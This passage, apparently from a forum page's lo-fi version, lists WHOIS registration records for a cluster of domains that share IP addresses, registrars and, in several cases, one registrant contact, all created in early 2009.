Registrar: COMMUNIGAL COMMUNICATIONS LTD
Name Server: DNS1.COMMUNIGAL.NET - DNS2.COMMUNIGAL.NET
Domain Contact is Private - domainprivate@communigal.com

cosmotraf.net - 88.198.8.15

Updated Date: 05-mar-2009
Creation Date: 05-mar-2009
Registrar: COMMUNIGAL COMMUNICATIONS LTD
Name Server: DNS1.COMMUNIGAL.NET - DNS2.COMMUNIGAL.NET
Domain Contact is Private - domainprivate@communigal.com

ydmstats.com - 88.198.8.15

Updated Date: 05-mar-2009
Creation Date: 05-mar-2009
Registrar: COMMUNIGAL COMMUNICATIONS LTD
Name Server: DNS1.COMMUNIGAL.NET - DNS2.COMMUNIGAL.NET
Domain Contact is Private - domainprivate@communigal.com

hit-detect.com - 88.198.8.15

Updated Date: 11-mar-2009
Creation Date: 10-mar-2009
Registrar: YESNIC CO. LTD.
Name Server: NS1.HIT-DETECT.COM - NS2.HIT-DETECT.COM - NS3.HIT-DETECT.COM
Gabriel Jenks - gabrielcjenks17@mail.com

statisticsishere.com - 88.198.8.15

Updated Date: 10-mar-2009
Creation Date: 05-mar-2009
Registrar: YESNIC CO. LTD.
Name Server: NS1.STATISTICSISHERE.COM - NS2.STATISTICSISHERE.COM - NS3.STATISTICSISHERE.COM
Gabriel Jenks - gabrielcjenks17@mail.com

statsnclick.com - 212.117.165.128

Updated Date: 11-mar-2009
Creation Date: 10-mar-2009
Registrar: YESNIC CO. LTD.
Name Server: NS1.STATSNCLICK.COM - NS2.STATSNCLICK.COM - NS3.STATSNCLICK.COM
Gabriel Jenks - gabrielcjenks17@mail.com

measurehits.com - 212.117.165.128

Updated Date: 05-mar-2009
Creation Date: 26-feb-2009
Registrar: YESNIC CO. LTD.
Name Server: NS1.MEASUREHITS.COM - NS2.MEASUREHITS.COM - NS3.MEASUREHITS.COM
Gabriel Jenks - gabrielcjenks17@mail.com

pleaselinkmeto.com - 212.117.165.128

Updated Date: 05-mar-2009
Creation Date: 05-mar-2009
Registrar: COMMUNIGAL COMMUNICATIONS LTD
Name Server: DNS1.COMMUNIGAL.NET - DNS2.COMMUNIGAL.NET
Domain Contact is Private - domainprivate@communigal.com

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.